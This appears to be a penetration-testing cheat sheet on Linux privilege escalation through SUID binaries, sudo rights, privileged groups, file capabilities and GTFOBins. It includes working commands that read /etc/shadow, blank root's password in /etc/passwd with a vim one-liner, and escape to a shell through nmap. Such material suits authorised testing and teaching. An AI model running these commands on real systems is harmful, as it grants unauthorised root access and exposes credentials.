Skip to main content

Permissions Abuse

SUID Permissions

SUID (Set User ID) allows a program to run with the privileges of the program's owner, often root. It's commonly used for privileged tasks but can be abused if misconfigured.

find / -type f -perm -4000 2>/dev/null

# If SUID program is found (e.g., /usr/bin/passwd)
ls -lah /usr/bin/passwd

# Run the SUID program with elevated privileges
/usr/bin/passwd

Sudo Permissions

Sudo permissions allow a user to run commands as another user, typically root. If a user has unrestricted sudo access or permission to run commands as root, they can easily escalate privileges.

sudo -l

# If you can run commands as root without a password
sudo <command>  # Replace <command> with any command

# We can then try to abuse that command to get root shell.

Privileged Groups

Privileged groups like adm or sudo provide access to sensitive files and system operations. Users in these groups may have elevated access to system logs or the ability to perform admin tasks.

groups

# If you're in a privileged group (e.g., adm)
# You might have access to logs or other sensitive files
cat /var/log/syslog

# If you can read /etc/shadow (highly sensitive)
sudo cat /etc/shadow

# View Summary report of the audit system logs
aureport --tty | less

Capabilities

Capabilities are fine-grained privileges attached to executables that allow them to perform specific tasks without needing full root access. These can be abused if an executable with elevated capabilities is accessible.

getcap -r / 2>/dev/null

# Output shows the binary has 'cap_dac_override' capability
/usr/bin/vim.basic cap_dac_override=eip

## We have 2 options:
# 1. Interactive Mode
/usr/bin/vim.basic /etc/passwd ## remove 'x' to skip password prompt
# 2. Non-Interactive Mode
echo -e ':%s/^root:[^:]*:/root::/\nwq!' | /usr/bin/vim.basic -es /etc/passwd

# The 'x' is removed from the root user's entry, meaning no password is required
# We can now ssh to log in as root without a password

GTFOBins - A Powerful Tool

GTFOBins is an essential resource for privilege escalation. It lists binaries that can be exploited in restricted shells or environments to escalate privileges or bypass restrictions.

https://gtfobins.github.io/

# For example, if you have access to a restricted shell
# Use nmap (if available) to escalate
nmap --interactive
nmap> !sh

GTFOBins provides methods to exploit common binaries that are often overlooked during security assessments, giving attackers a powerful tool for privilege escalation.